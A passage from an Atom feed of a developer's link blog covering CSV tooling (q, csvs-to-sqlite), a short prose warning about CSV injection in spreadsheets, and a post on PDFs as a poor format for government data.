</summary><category term="csv"/><category term="projects"/><category term="search"/><category term="sqlite"/><category term="datasette"/></entry><entry><title>harelba/q</title><link href="https://simonwillison.net/2017/Nov/25/q/#atom-tag" rel="alternate"/><published>2017-11-25T17:49:19+00:00</published><updated>2017-11-25T17:49:19+00:00</updated><id>https://simonwillison.net/2017/Nov/25/q/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/harelba/q"&gt;harelba/q&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
q is a neat command-line utility that lets you run SQL queries directly against CSV and TSV files. Internally it works by firing up an in-memory SQLite database, and as of the latest release (1.7.1) you can use the new --save-db-to-disk option to save that in-memory database to disk.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/harelba/status/934192325907156992"&gt;Harel Ben-Attia&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="sqlite"/></entry><entry><title>csvs-to-sqlite: Refactoring columns into separate lookup tables</title><link href="https://simonwillison.net/2017/Nov/17/refactoring/#atom-tag" rel="alternate"/><published>2017-11-17T06:41:16+00:00</published><updated>2017-11-17T06:41:16+00:00</updated><id>https://simonwillison.net/2017/Nov/17/refactoring/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csvs-to-sqlite/blob/e5263a53cce513bce7857c4e0f27aff769e0fe6d/README.md#refactoring-columns-into-separate-lookup-tables"&gt;csvs-to-sqlite: Refactoring columns into separate lookup tables&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I just shipped a new version of csvs-to-sqlite with the ability to extract specified columns into a separate SQLite lookup table by passing additional command-line arguments.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="projects"/></entry><entry><title>simonw/csvs-to-sqlite</title><link href="https://simonwillison.net/2017/Nov/13/csvs-to-sqlite/#atom-tag" rel="alternate"/><published>2017-11-13T06:49:45+00:00</published><updated>2017-11-13T06:49:45+00:00</updated><id>https://simonwillison.net/2017/Nov/13/csvs-to-sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csvs-to-sqlite"&gt;simonw/csvs-to-sqlite&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I built a simple tool for bulk converting multiple CSV files into a SQLite database.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="github"/><category term="projects"/><category term="sqlite"/><category term="datasette"/></entry><entry><title>The Absurdly Underestimated Dangers of CSV Injection</title><link href="https://simonwillison.net/2017/Oct/10/csv/#atom-tag" rel="alternate"/><published>2017-10-10T04:13:46+00:00</published><updated>2017-10-10T04:13:46+00:00</updated><id>https://simonwillison.net/2017/Oct/10/csv/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://georgemauer.net/2017/10/07/csv-injection.html"&gt;The Absurdly Underestimated Dangers of CSV Injection&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
This is horrifying. A plain old CSV file intended for import into Excel can embed formulas (a value prefixed with an equals symbol) which can execute system commands—with a big honking security prompt that most people will likely ignore. Even worse: they can embed IMPORTXML() functions that can silently leak data from the rest of the sheet to an external URL—and those will work against Google Sheets as well as Excel.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="security"/></entry><entry><title>No PDFs!</title><link href="https://simonwillison.net/2009/Nov/1/pdfs/#atom-tag" rel="alternate"/><published>2009-11-01T12:04:36+00:00</published><updated>2009-11-01T12:04:36+00:00</updated><id>https://simonwillison.net/2009/Nov/1/pdfs/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://blog.sunlightfoundation.com/2009/06/05/no-pdfs/"&gt;No PDFs!&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The Sunlight Foundation point out that PDFs are a terrible way of implementing “more transparent government” due to their general lack of structure. At the Guardian (and I’m sure at other newspapers) we waste an absurd amount of time manually extracting data from PDF files and turning it in to something more useful. Even CSV is significantly more useful for many types of information.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/adobe"&gt;adobe&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-data"&gt;open-data&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/opengovernment"&gt;opengovernment&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pdf"&gt;pdf&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sunlightfoundation"&gt;sunlightfoundation&lt;/a&gt;&lt;/p&gt;



</summary><category term="adobe"/><category term="csv"/><category term="open-data"/><category term="opengovernment"/><category term="pdf"/><category term="sunlightfoundation"/></entry></feed>